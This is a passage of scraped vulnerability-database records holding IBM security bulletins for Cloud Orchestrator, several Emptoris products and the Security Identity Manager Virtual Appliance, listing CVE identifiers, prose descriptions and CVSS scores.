Enterprise_](<http://www.ibm.com/support/docview.wss?uid=swg21883331>) \n \n \n**Note:** You should verify applying this configuration change does not cause any compatibility issues. If you change the default setting after applying the fix, you will expose yourself to the attack described above. IBM recommends that you review your entire environment to identify other areas where you have enabled the Diffie-Hellman key-exchange protocol used in TLS and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:49", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1788", "CVE-2015-1932", "CVE-2015-2017", "CVE-2015-3183", "CVE-2015-3646", "CVE-2015-4000", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-4938", "CVE-2015-4947", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2018-06-17T22:32:49", "id": 
"C7F9DAB9D9A5A1B7F9CB5FED324EFCAC4C72B5C0E11F0AF70FA86C8048D14D8D", "href": "https://www.ibm.com/support/pages/node/599155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:47", "description": "## Question\n\nSecurity Bulletins for Emptoris Program Management\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Program Management.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. Please use this information to take the appropriate actions.\n\nWe recommend that you subscribe to this article to receive notification of future Security Bulletins and advisories posted here. \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nMay 2nd 2016\n\n * **[Security Bulletin: Vulnerability in BeanShell affects IBM Emptoris Strategic Supply Management. 
(CVE-2016-2510)](<http://www.ibm.com/support/docview.wss?uid=swg21982152&myns=swgother&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYRER-OCSSYQ89-_-E>)**\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nSeptember 22 2015\n\n * **[Security Bulletin: Cross-Site Scripting vulnerabilities affect IBM Emptoris Strategic Supply Management Platform Emptoris Program Management and Emptoris Supplier Lifecycle Management products (CVE-2015-4971 CVE-2015-4939)](<https://emptoris.support.ibmcloud.com/ics/support/default.asp?deptID=31019&task=knowledge&questionID=22171&languageID=>)**\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n\nJanuary 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\nDecember 31 2014\n\n * **[Security 
Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n\nSeptember 17 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244) ](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_multiple_vulnerabilities_in_ibm_java_sdk_affect_ibm_emptoris_strategic_supply_management_ibm_emptoris_rivermine_telecom_expense_management_and_ibm_emptoris_services_procurement_cve_2014_4263_cve_2014_4244?lang=en_us>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYRER\",\"label\":\"Emptoris Program Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T16:15:01", "type": "ibm", "title": "Security Bulletins for Emptoris Program Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4939", "CVE-2015-4971", "CVE-2015-7450", "CVE-2016-2510", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T16:15:01", "id": "0CE9B36358C9687E7112577EA1304074A68EA6DD5359A3F6615F7BA94A6B8E7D", "href": "https://www.ibm.com/support/pages/node/783531", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:49", "description": "## Question\n\nSecurity Bulletins for Emptoris Spend Analysis\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Spend Analysis.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. 
Please use this information to take the appropriate actions.\n\nIn our effort to serve you better we recommend that you subscribe to this article for notification of future Security Bulletins and advisories posted here.\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. 
(CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n\nJanuary 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\n
September 17 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\nAugust 23 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Emptoris Spend Analysis (CVE-2014-3061 CVE-2014-3035 CVE-2014-4790 CVE-2014-3040)](<http://www-01.ibm.com/support/docview.wss?uid=swg21681277>)**\n\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYQAR\",\"label\":\"Emptoris Spend Analysis\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T15:10:02", "type": "ibm", "title": "Security Bulletins for Emptoris Spend Analysis", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3035", 
"CVE-2014-3040", "CVE-2014-3061", "CVE-2014-3566", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-4790", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-7450", "CVE-2016-3092", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T15:10:02", "id": "3FDC0101985ADD7D5774F255D78C573813EE11684088944BAF72283AB319514E", "href": "https://www.ibm.com/support/pages/node/783535", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:54", "description": "## Question\n\nSecurity Bulletins for Emptoris Supplier Lifecycle Management\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Supplier Lifecycle Management.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. Please use this information to take the appropriate actions.\n\nIn our effort to serve you better we recommend that you subscribe to this article for notification of future Security Bulletins and advisories posted here. 
\n\nNovember 6th 2017\n\n * **_[Security Bulletin: IBM Emptoris Supplier Lifecycle Management is affected by a Cross Site Scripting vulnerability (CVE-2016-6118 CVE-2017-1098)](<http://www.ibm.com/support/docview.wss?uid=swg22005824>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities addressed in the IBM Emptoris Supplier Lifecycle Management product (CVE-2016-8949 CVE-2017-1448 CVE-2016-6121)_**](<http://www.ibm.com/support/docview.wss?uid=swg22006854>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nSeptember 18 2015\n\n * **[Security Bulletin: Cross-Site Scripting vulnerabilities affect IBM Emptoris Strategic Supply Management Platform Emptoris Program Management and Emptoris Supplier Lifecycle Management products (CVE-2015-4971 CVE-2015-4939)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966754>)**\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJuly 8 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\nApril 8 2015\n\n * [IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom 
Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)\n\nJanuary 27 2015\n\n * [IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)\n\nSeptember 17 2014\n\n * [IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21681277>)\n\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYRC7\",\"label\":\"Emptoris Supplier Lifecycle Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T13:10:02", "type": "ibm", "title": "Security Bulletins for Emptoris Supplier Lifecycle Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4939", "CVE-2015-4971", "CVE-2015-7450", "CVE-2016-3092", "CVE-2016-6118", "CVE-2016-6121", "CVE-2016-8949", "CVE-2017-1098", "CVE-2017-1448"], "modified": "2018-12-08T13:10:02", "id": "D5DD24C882DBB1D9A7CA1FF6A2B5E71A2110BD5524772EF5C4D134F94002AC84", "href": "https://www.ibm.com/support/pages/node/784303", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:51", "description": "## Summary\n\nThere are multiple security vulnerabilities in various components used by IBM Security Identity Manager Virtual Appliance\n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2014-3565_](<https://vulners.com/cve/CVE-2014-3565>)** \nDESCRIPTION:** Net-SNMP is vulnerable to a denial of service, caused by the improper handling of SNMP traps when started with the \"-OQ\" option. By sending an SNMP trap message containing a variable with a NULL type, a remote attacker could exploit this vulnerability to cause snmptrapd to crash. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/95638_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/95638>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**CVEID:** [_CVE-2014-3613_](<https://vulners.com/cve/CVE-2014-3613>)** \nDESCRIPTION:** cURL/libcURL could allow a remote attacker to bypass security restrictions, caused by the failure to properly detect and reject domain names for IP addresses. An attacker could exploit this vulnerability to send cookies to an incorrect site. 
\nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/95925_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/95925>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n \n**CVEID:** [_CVE-2014-3707_](<https://vulners.com/cve/CVE-2014-3707>)** \nDESCRIPTION:** cURL/libcURL could allow a remote attacker to obtain sensitive information, caused by an error in the curl_easy_duphandle() function. An attacker could exploit this vulnerability to corrupt heap memory and obtain sensitive information or cause a denial of service. \nCVSS Base Score: 6.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/98562_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/98562>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:P) \n\n \n**CVEID:** [_CVE-2014-8121_](<https://vulners.com/cve/CVE-2014-8121>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a denial of service, caused by the failure to properly check if a file is open by DB_LOOKUP in nss_files/files-XXX.c in the Name Service Switch (NSS). By performing a look-up on a database while iterating over it, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/102652_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/102652>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n\n**CVEID:** [_CVE-2014-8150_](<https://vulners.com/cve/CVE-2014-8150>)** \nDESCRIPTION:** libcURL is vulnerable to CRLF injection, caused by the improper handling of URLs with embedded end-of-line characters. 
By persuading a victim to click on a specially-crafted URL link using an HTTP proxy, a remote attacker could exploit this vulnerability to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100567_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100567>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n \n**CVEID:** [_CVE-2014-9297_](<https://vulners.com/cve/CVE-2014-9297>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) could allow a remote attacker to conduct spoofing attacks, caused by insufficient entropy in PRNG. An attacker could exploit this vulnerability to spoof the IPv6 address ::1 to bypass ACLs and launch further attacks on the system. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100004_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100004>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n \n**CVEID:** [_CVE-2014-9298_](<https://vulners.com/cve/CVE-2014-9298>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) could allow a remote attacker to obtain sensitive information, caused by the improper validation of the length value in extension field pointers. An attacker could exploit this vulnerability to obtain sensitive information. 
\nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100005_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100005>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n**CVEID:** [_CVE-2015-1798_](<https://vulners.com/cve/CVE-2015-1798>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) could allow a remote attacker to bypass security restrictions, caused by the acceptance of packets that do not contain a message authentication code (MAC) as valid packets when configured for symmetric key authentication. An attacker could exploit this vulnerability using man-in-the-middle techniques to bypass the authentication process. \nCVSS Base Score: 5.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102051_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102051>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2015-1799_](<https://vulners.com/cve/CVE-2015-1799>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) is vulnerable to a denial of service, caused by an error when using symmetric key authentication. By sending specially-crafted packets to both peering hosts, an attacker could exploit this vulnerability to prevent synchronization. \nCVSS Base Score: 5.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102052_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102052>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2015-1819_](<https://vulners.com/cve/CVE-2015-1819>)** \nDESCRIPTION:** Libxml is vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error in the xmlreader when processing XML data. 
A remote attacker could exploit this vulnerability to consume all available memory resources. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107272_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107272>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n**CVEID:** [_CVE-2015-2017_](<https://vulners.com/cve/CVE-2015-2017>)** \nDESCRIPTION:** The IBM WebSphere Portal is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using a specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/103991_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103991>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n**CVEID:** [_CVE-2015-2730_](<https://vulners.com/cve/CVE-2015-2730>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to bypass security restrictions, caused by the failure to properly handle certain exceptional cases by the Elliptic Curve Cryptography (ECC) multiplication for Elliptic Curve Digital Signature Algorithm (ECDSA) signature validation in Network Security Services (NSS). By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to forge signatures. 
\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/104386_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/104386>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n\n**CVEID:** [_CVE-2015-3143_](<https://vulners.com/cve/CVE-2015-3143>)** \nDESCRIPTION:** libcurl could allow a remote attacker from within the local network to bypass security restrictions, caused by the re-use of recently authenticated connections. By sending a new NTLM-authenticated request, an attacker could exploit this vulnerability to perform unauthorized actions with the privileges of the victim. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102888_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102888>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-3148_](<https://vulners.com/cve/CVE-2015-3148>)** \nDESCRIPTION:** libcurl and cURL could allow a remote attacker to bypass security restrictions, caused by improper use of the Negotiate authentication method. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions and connect as other users. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102878_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102878>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-3238_](<https://vulners.com/cve/CVE-2015-3238>)** \nDESCRIPTION:** Linux-PAM could allow a local attacker to obtain sensitive information, caused by an error in the _unix_run_helper_binary function in the pam_unix module. 
